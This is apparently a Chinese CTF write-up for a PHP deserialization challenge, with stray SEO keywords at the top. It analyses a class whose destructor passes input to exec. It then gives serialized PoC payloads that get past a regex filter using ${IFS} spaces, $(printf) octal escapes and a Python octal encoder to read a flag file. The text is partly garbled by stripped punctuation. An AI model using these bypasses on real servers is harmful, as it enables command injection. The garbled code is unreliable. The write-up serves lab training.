opencart做视频网站,seo品牌优化,国家企业公示信息系统全国,wordpress显示最后更新时间源码分析
?php
highlight_file(__FILE__);//代码高亮
class ease{//声明了两个私有属性#xff1a;保存要调用的方法的名称和保存该方法的参数。$method#xff0c;$argsprivate $method;private $args;//构造函数在实例化类的对象时初始化,即为对象成员变量赋初始值。…源码分析
?php
highlight_file(__FILE__);//代码高亮
class ease{//声明了两个私有属性保存要调用的方法的名称和保存该方法的参数。$method$argsprivate $method;private $args;//构造函数在实例化类的对象时初始化,即为对象成员变量赋初始值。function __construct($method, $args) {$this-method $method;$this-args $args;}//析构函数(destructor) 与构造函数相反当对象结束其生命周期时例如对象所在的函数已调用完毕系统自动执行析构函数。function __destruct(){//if (in_array($this-method, array(ping))) {//call_user_func_array() 是一个函数用于调用一个回调函数方法并传递参数。call_user_func_array(array($this, $this-method), $this-args);}//检查当前请求的方法 $this-method 是否为 ping。如果是调用该方法即 $this-method并将 $this-args 作为参数传递。} //该方法将 IP 地址作为参数并使用 将其作为 shell 命令exec执行function ping($ip){exec($ip, $result);var_dump($result);}//防火墙通过正则匹配过滤了|;空格/catflagtacphplsfunction waf($str){if (!preg_match_all(/(\|||;| |\/|cat|flag|tac|php|ls)/, $str, $pat_array)) {return $str;} else {echo dont hack;}}//当对象被反序列化时将调用该方法。它遍历属性使用该方法匹配清理每个参数function __wakeup(){foreach($this-args as $k $v) {$this-args[$k] $this-waf($v);}}
}
//采用POST传参的方式抑制报错信息
$ctf$_POST[ctf];
//将传入参数进行base64解码再反序列化。
unserialize(base64_decode($ctf));
?解题思路
1要求 对post传入的参数进行了base64解密和反序列化。意思就是传入的值经过了base64加密和序列化。 2preg_match_all(/(|||;| |/|cat|flag|tac|php|ls)这句话也是一个思路为什么过滤这些命令肯定是对解题有帮助才不让我们用那我们就需要绕过这些命令。 3我们的目的是找flag那我们就需要借助ls查看一下整体的布局看能不能检索出有用的信息来。
第一步构造原始poc验证思路
?php
class ease{ private $method;private $args;function __construct($method, $args) {$this-method $method;$this-args $args;}
}
$anew ease(ping,array(ls));
$bserialize($a);
echo base64_encode($b);
? 发现回显don’t hack这是为什么呢我们使用了ls命令而正则匹配那里过滤了这个语句所有返回don’t hack。
解题
绕过ls命令
1“”
$anew ease(ping,array(ls));2:${Z}
$anew ease(ping,array(l${Z}s));3:${IFS}
根据回显进一步解题
${IFS}
命令执行漏洞的空格过滤在linux当中%09(tab)、$IFS$9、 I F S 、 {IFS}、 IFS、IFS这些都可以当做空格符作为代替。此题中 $IFS$9 ${IFS}可以绕过空格此题中 1思路 回显array(2) { [0] string(12) “flag_1s_here” [1] string(9) “index.php” } 显而易见藏有flag的目录在flag_1s_here为什么不是文档英文如果是文档应该带有文件后缀就像后面的.php再者说如果将文件后缀名藏匿起来了后面的index.php的后缀名也应该藏起来了。这里首先猜是目录。 2执行命令ls flag_1s_here
$anew ease(ping,array(ls${IFS}flag_1s_here));完整运行代码 执行成功返回了藏有flag的php文件 3: 查看flag_831b69012c67b35f.php用到的原始命令 tac flag_1s_here/flag_831b69012c67b35f.php tac flag_1s_here/flag_831b69012c67b35f.php都行 加工插入poc
$anew ease(ping,array(tac${IFS}flag_1s_here$(printf${IFS}\57)flag_831b69012c67b35f.php));
//$()中可以执行函数\57为\ascii值
//$(printf${IFS}\57)这句话用来跳过\解法2
linux中$(printf)
1 ( ) 中可以执行命令当 ()中可以执行命令当 ()中可以执行命令当()中为printf时执行打印命令。 举例
echo $(printf \154\163)
\154 是字符 l 的八进制表示。
\163 是字符 s 的八进制表示。
因此$(printf \154\163) 会输出字符串 ls。就会执行ls命令。同理这里的”\154\163“翻译成字母是ls打印ls命令就执行了ls命令而我们要执行的命令tac flag_1s_here/flag_831b69012c67b35f.php是否也可以用此法
oct绕过将命令转为八进制执行下面代码的第二个自定义函数将命令转为八进制字符串。
def string_to_binary(string):# 将每个字符转换为其二进制表示并格式化binary_string \\.join(format(ord(char), 08b) for char in string)return binary_stringdef string_to_octal(string):# 将每个字符转换为其八进制表示并格式化# ord(char)获取字符的ASCII值。# format(ord(char), 03o)将ASCII值转换为三位的八进制表示。# join()将生成的八进制字符串连接成一个以 \ 分隔的字符串。octal_string \\.join(format(ord(char), 03o) for char in string)return octal_stringdef string_to_hex(string):# 将每个字符转换为其十六进制表示并格式化hex_string \\.join(format(ord(char), 02x) for char in string)return hex_stringstr1 cat flag_1s_here/flag_831b69012c67b35f.php
binary_string string_to_binary(str1)
octal_string string_to_octal(str1)
hex_string string_to_hex(str1)
print(f二进制\{binary_string})
print(\n)
print(f八进制\{octal_string})
print(\n)
print(f十六进制\{hex_string})成功。
既然可以用编码执行命令那我们是不是可以将之前的所有步骤都用此法绕过
经过验证完全可以感兴趣可以去试试。
